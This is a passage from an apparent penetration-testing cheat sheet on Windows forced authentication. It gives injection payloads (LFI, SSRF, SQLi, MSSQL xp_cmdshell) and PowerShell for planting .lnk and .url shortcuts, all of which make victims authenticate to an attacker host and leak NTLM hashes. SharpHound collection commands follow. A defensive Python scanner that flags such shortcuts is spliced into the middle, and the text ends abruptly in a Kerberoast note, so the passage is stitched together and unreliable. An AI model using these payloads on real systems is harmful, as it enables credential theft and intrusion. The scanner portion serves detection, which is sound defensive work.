If you discover a web vulnerability (such as LFI, SQLi, XXE, SSRF or SSTI) that lets you make the server include a remote file, you can exploit it to capture the NTLM hash of the user the process runs as. For example:

```
# LFI
?page=\\10.10.10.10\test

# SSRF
?url=file://10.10.10.10/test

# SQL Injection
?id=1' union select null,load_file('\\\\10.10.10.10\\test'),null-- -

# MSSQL
?id=1' union select null,(select x from OpenRowset(BULK '\\10.10.10.10\test',SINGLE_CLOB) R(x)),null-- -
?id=1' union select null,(EXEC xp_cmdshell 'dir \\10.10.10.10\test'),null-- -
```
Shortcut.lnk File
```powershell
# Create a shortcut.lnk with PowerShell
$targetPath = "\\10.10.10.10\test"
$shortcutPath = "C:\path\to\your\~shortcut.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$shortcut = $WScriptShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.Save()
```
Shortcut.url File
```powershell
# Create a shortcut.url with PowerShell
echo '[InternetShortcut]' > ~shortcut.url
echo 'URL=file:///\\10.10.10.10\test' >> ~shortcut.url
```
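The defensive counterpart to the forced-authentication tricks above (the UNC payloads and the planted `.lnk`/`.url` files) is finding such shortcuts on writable shares before anyone opens them. The following Python triage scanner is an added example and not code from the original page: it walks a directory, parses `.url` files (checking `URL`, `WorkingDirectory` and `IconFile`, all of which Explorer resolves) and pulls UNC host names out of raw `.lnk` files, then reports any host that is not on an allowlist of known file servers. The allowlist, the directory layout and the sample files are constructed assumptions, and the `.lnk` check is a string heuristic over the raw bytes, not a full ShellLink parser.

```python
"""Triage scanner for .url/.lnk shortcuts that point at UNC hosts outside an
allowlist.  Added example (not from the original page); the allowlist and the
sample files written by build_samples() are constructed for this demo."""
import os
import re
import tempfile
from typing import Optional

# Assumption: the only hosts that shortcuts should legitimately reference.
ALLOWED_HOSTS = {"fileserver01", "fileserver01.corp.local"}

# Host part of a UNC path such as \\host\share (string ends or continues with \ or NUL).
UNC_HOST_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)(?=[\\\x00]|$)")
# Host part of a file: URL such as file://host/share or file:///\\host\share.
FILE_URL_RE = re.compile(r"^file:[\\/]+([A-Za-z0-9._-]+)(?=[\\/]|$)", re.IGNORECASE)


def target_host(target: str) -> Optional[str]:
    """Return the remote host a shortcut target refers to, or None if it is local."""
    t = target.strip()
    m = FILE_URL_RE.match(t) or UNC_HOST_RE.match(t)
    return m.group(1).lower() if m else None


def hosts_in_url_file(text: str) -> set:
    """Parse the INI-style .url format and collect hosts from UNC/file: values."""
    found, section = set(), None
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, value = line.split("=", 1)
            # IconFile and WorkingDirectory are resolved by Explorer too, so check them.
            if key.strip().lower() in ("url", "workingdirectory", "iconfile"):
                host = target_host(value)
                if host:
                    found.add(host)
    return found


def hosts_in_lnk(data: bytes) -> set:
    """Heuristic: pull UNC hosts out of a .lnk's ANSI and UTF-16LE strings.
    Only the fixed HeaderSize field (0x4C) is checked; the rest is a string scan."""
    if data[:4] != b"\x4c\x00\x00\x00":
        return set()
    texts = [data.decode("latin-1")]
    for off in (0, 1):  # try both byte alignments for UTF-16LE strings
        texts.append(data[off:].decode("utf-16-le", errors="ignore"))
    found = set()
    for text in texts:
        found.update(h.lower() for h in UNC_HOST_RE.findall(text))
    return found


def scan_directory(root: str) -> list:
    """Return sorted (path, host) pairs for shortcuts referencing non-allowlisted hosts."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = name.lower().rsplit(".", 1)[-1] if "." in name else ""
            hosts = set()
            if ext == "url":
                with open(path, "r", encoding="utf-8", errors="replace") as f:
                    hosts = hosts_in_url_file(f.read())
            elif ext == "lnk":
                with open(path, "rb") as f:
                    hosts = hosts_in_lnk(f.read())
            findings.extend((path, h) for h in sorted(hosts) if h not in ALLOWED_HOSTS)
    return sorted(findings)


def build_samples(root: str) -> None:
    """Write constructed sample shortcuts (not real captures) into root."""
    os.makedirs(root, exist_ok=True)
    with open(os.path.join(root, "~shortcut.url"), "w") as f:
        f.write("[InternetShortcut]\r\nURL=file:///\\\\10.10.10.10\\test\r\n")
    with open(os.path.join(root, "benign.url"), "w") as f:
        f.write("[InternetShortcut]\r\nURL=https://intranet.example/\r\n"
                "IconFile=\\\\fileserver01\\icons\\a.ico\r\n")
    # Stand-in for a .lnk: the real 0x4C HeaderSize field, zero padding, then a
    # UTF-16LE UNC string; enough to exercise the string heuristic above.
    fake_lnk = (b"\x4c\x00\x00\x00" + b"\x00" * 72
                + "\\\\10.10.10.10\\test".encode("utf-16-le") + b"\x00\x00")
    with open(os.path.join(root, "planted.lnk"), "wb") as f:
        f.write(fake_lnk)


def demo() -> list:
    """Build the constructed samples in a temp dir and scan them."""
    root = tempfile.mkdtemp(prefix="shortcut-scan-")
    build_samples(root)
    return scan_directory(root)


if __name__ == "__main__":
    for path, host in demo():
        print(f"SUSPICIOUS {host:<20} {path}")
```

Run against a real share root instead of `demo()` to get a list of files worth pulling for review; a finding only says the shortcut references a host that is not on the allowlist, so tune `ALLOWED_HOSTS` to your environment before trusting the output.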
```powershell
# EXE
.\SharpHound.exe -CollectionMethods All

# PS1
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethods All -OutputDirectory .
```
Kerberoast
If you get this error from Linux: `Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`, it is caused by your local clock: you need to synchronise the host's time with the DC. There are a few options: